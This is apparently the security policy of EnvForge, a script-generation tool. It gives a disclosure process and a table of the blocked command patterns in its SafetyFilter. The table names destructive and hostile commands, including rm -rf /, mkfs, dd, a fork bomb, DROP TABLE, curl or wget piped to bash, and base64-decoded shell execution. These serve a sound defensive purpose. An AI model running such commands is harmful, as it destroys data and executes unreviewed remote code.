Deterministic logic > AI generation. Because EnvForge generates scripts that run on user systems, we take security exceptionally seriously.
EnvForge provides security updates for the following versions:
| Version | Supported | Notes |
|---|---|---|
| 0.2.x | ✅ | Currently in active development |
| 0.1.x | ❌ | Alpha release, no longer maintained |
If you discover a security vulnerability in the backend API, template engine, or CLI agent, please report it to us privately.
DO NOT open a public GitHub issue for security vulnerabilities.
Instead, please email rishabh0510@gmail.com with:
- A description of the vulnerability.
- Steps to reproduce the issue.
- The affected versions or components (e.g.,
TemplateRenderer,envforge-agent). - Any potential mitigations you suggest.
EnvForge explicitly forbids the generation of dangerous shell commands. Every generated script passes through a strict SafetyFilter. We consider any bypass of this filter a critical security vulnerability.
Prohibited commands include, but are not limited to:
- Recursive directory deletion (
rm -rf /,rm -rf $HOME) - Filesystem formatting (
mkfs,format C:) - Raw disk writing (
dd) - System shutdown or reboot commands
- Database drop commands (
DROP TABLE,DROP DATABASE)
For full details, read our Script Safety Policy.
EnvForge is designed to provision and repair, not to blindly destroy.
- We do not generate scripts that automatically uninstall GPU drivers.
- We do not generate scripts that forcefully delete Python environments without explicit user consent.
- All repair scripts must be auditable plain-text files.
We encourage users to test generated scripts inside Docker containers or isolated WSL environments whenever possible. We explicitly provide a Dockerfile output format for every profile to support this sandboxed approach.
Every script generated by EnvForge is validated by the SafetyFilter
in backend/app/templates/safety.py before being returned to the client.
The enforced safety gate in normal rendering is the regex-based validation step.
An additional AI audit path exists, but it is optional and only runs when an
llm_client is explicitly supplied.
Stage 1 — Regex Pattern Matching
The full rendered script is scanned against a list of compiled regular
expressions. Matching is case-insensitive and dot-all (spans newlines). If any
pattern matches, a SafetyViolationError is raised immediately and the script
is rejected — it is never returned to the user.
Stage 2 — Optional AI Auditor
When an LLM provider is configured, the full script is additionally sent to the LLM acting as a strict Linux security auditor. If the AI flags the script as unsafe, it is rejected with the AI's stated reason. This stage is best-effort — if the LLM provider is unavailable, it is skipped and Stage 1 alone applies.
The following table maps each blocked category to its regex pattern, a plain-English description of what it matches, and why it is dangerous.
| # | Category | What It Matches | Why It Is Blocked |
|---|---|---|---|
| 1 | Root filesystem deletion | rm -rf /, rm -rRf / (only when / is not followed by a word character) |
Irreversibly wipes the entire filesystem from the root downward |
| 2 | Home directory deletion (variable) | rm -rf $HOME |
Destroys the user's entire home directory via the $HOME environment variable |
| 3 | Home directory deletion (tilde) | rm -rf ~ |
Same as above but using the tilde shorthand for the home directory |
| 4 | Filesystem formatting | mkfs.ext4, mkfs.vfat, any mkfs.* variant |
Formats a disk partition, erasing all data on it |
| 5 | Windows drive formatting | format C:, format D: etc. |
Formats a Windows drive letter, causing total data loss |
| 6 | Fork bomb | : () { : | : & }; : — the classic process-exhaustion pattern |
Spawns processes exponentially until the system runs out of resources and crashes |
| 7 | Raw disk write | dd if= |
Writes raw data directly to a disk device, bypassing the filesystem; can corrupt or destroy an entire drive |
| 8 | Direct disk write via redirect | > /dev/sda, > /dev/sdb etc. |
Overwrites a raw block device directly from the shell, destroying its contents |
| 9 | System shutdown or reboot | shutdown /s, shutdown /r, shutdown -h, shutdown -r |
Halts or reboots the system, terminating all running processes |
| 10 | SQL database destruction | DROP DATABASE |
Permanently deletes an entire database and all its data |
| 11 | SQL table destruction | DROP TABLE |
Permanently deletes a database table and all its rows |
| 12 | SQL table truncation | TRUNCATE TABLE |
Removes all rows from a table instantly and irreversibly |
| 13 | Curl-pipe-to-shell | curl <url> | bash, curl <url> | sh |
Downloads and executes arbitrary remote code without review; a common supply-chain attack vector |
| 14 | Wget-pipe-to-shell | wget -O- <url> | bash |
Same risk as curl-pipe-to-shell but using wget as the downloader |
| 15 | Eval of subshell output | eval $(...) |
Executes dynamically constructed shell commands; easily abused to run hidden payloads |
| 16 | Base64 decode pipe to shell | base64 --decode | sh |
Decodes and executes obfuscated shell commands; a common technique for hiding malicious payloads |
Regex allows fast, stateless scanning of the entire rendered shell script output without executing it. Key properties of the implementation:
- Case-insensitive (
re.IGNORECASE) — catchesRM -RF,Rm -Rf, etc. - Dot-all mode (
re.DOTALL) — patterns span newlines, preventing trivial line-break bypasses. - Compiled at startup — all patterns are pre-compiled once when the module loads, keeping per-request overhead negligible.
- Fail-closed — any pattern match raises an exception and blocks the script; there is no fallback that permits the output.
The filter targets destructive and obfuscated operations only. Normal ML environment setup commands are fully permitted, including:
- Package managers:
pip install,apt-get install,conda install - Virtual environment creation:
python -m venv,conda create - CUDA toolkit and driver installation via official installers
- File writes within project or user directories
- Standard network calls such as
curlorwgetwhen not piped directly to a shell
If you discover a command that should be blocked but is not, please report it privately following the Responsible Disclosure process above rather than opening a public issue. Filter bypass reports are treated as security vulnerabilities.
If a legitimate command is incorrectly blocked (false positive), open a regular GitHub issue describing the command and its intended use case so the pattern can be refined.